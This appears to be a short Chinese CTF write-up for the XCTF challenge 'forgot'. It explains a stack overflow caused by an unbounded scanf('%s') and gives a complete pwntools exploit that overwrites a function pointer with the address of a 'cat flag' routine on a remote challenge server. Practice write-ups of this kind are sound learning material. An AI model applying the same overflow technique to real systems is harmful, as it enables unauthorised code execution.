攻防世界2

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
HitpointNetSuite7 分钟前
连锁餐饮行业ERP如何选择:为何Oracle NetSuite成为增长新引擎
大数据·运维·数据库·oracle·netsuite
讲师-汪春波7 分钟前
[运维]宝塔 Apache环境使用CDN获取访客真实IP方法
运维·tcp/ip·apache·cdn
陌路204 小时前
Linux18--进程间的通信总结
linux
2401_858286114 小时前
OS36.【Linux】简单理解EXT2文件系统(2)
linux·运维·服务器·数据结构·文件系统·ext2
勤源科技4 小时前
全链路智能运维中的业务连续性保障与容灾切换机制
运维
Zach_yuan4 小时前
程序地址空间
android·linux·运维·服务器
梁萌5 小时前
Linux安装BiliNote
linux·运维·服务器·docker·bilinote
小安运维日记5 小时前
RHCA - DO374 | Day03:通过自动化控制器运行剧本
linux·运维·数据库·自动化·ansible·1024程序员节
行思理6 小时前
docker新手教程
运维·docker·容器
乐十九7 小时前
IIC总线原理详解
linux